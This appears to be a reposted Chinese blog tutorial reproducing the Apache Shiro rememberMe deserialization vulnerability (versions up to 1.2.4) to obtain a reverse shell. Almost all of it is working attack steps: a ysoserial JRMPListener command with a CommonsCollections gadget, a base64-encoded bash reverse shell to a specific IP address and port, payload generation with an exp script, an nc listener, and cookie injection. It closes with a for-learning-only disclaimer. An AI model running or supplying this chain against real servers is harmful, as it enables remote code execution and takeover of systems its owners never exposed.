Apache shiro 反序列化漏洞復現(反彈 shell)


0x01 影響版本

Apache Shiro <= 1.2.4

0x02 漏洞位置

http 請求包 cookie 中的 rememberMe 參數。

0x03 漏洞復現

  1. 在公網 vps 執行下列命令
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4 "反 彈 shell 的命令"

這里的命令,需要使用 Java Runtime 配合 bash 編碼。
在線轉換地址

在這里插入圖片描述最終執行命令為:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections4
"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80OS4yMzUuMjEyLjExOC8xMjM0IDA+JiAx}|{ base64,-d}|{bash,-i}"

理論上,這里的 CommonsCollections4 也可以換成 CommonsCollections2
在這里插入圖片描述

  1. 使用 exp 生成 payload。(我這里是在本地 kali 下運行的)
    python exp.py 公網 vps:1099
    在這里插入圖片描述
  2. 公網 vps 開啟 nc 監聽。
    在這里插入圖片描述
  3. 抓任意 http 數據包,在 cookie 中追加 payload。
    在這里插入圖片描述
  4. 反彈shell。
    在這里插入圖片描述

注:本文僅供參考學習,請勿在網上搞破壞,觸犯法律者應承擔相應的法律責任!


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM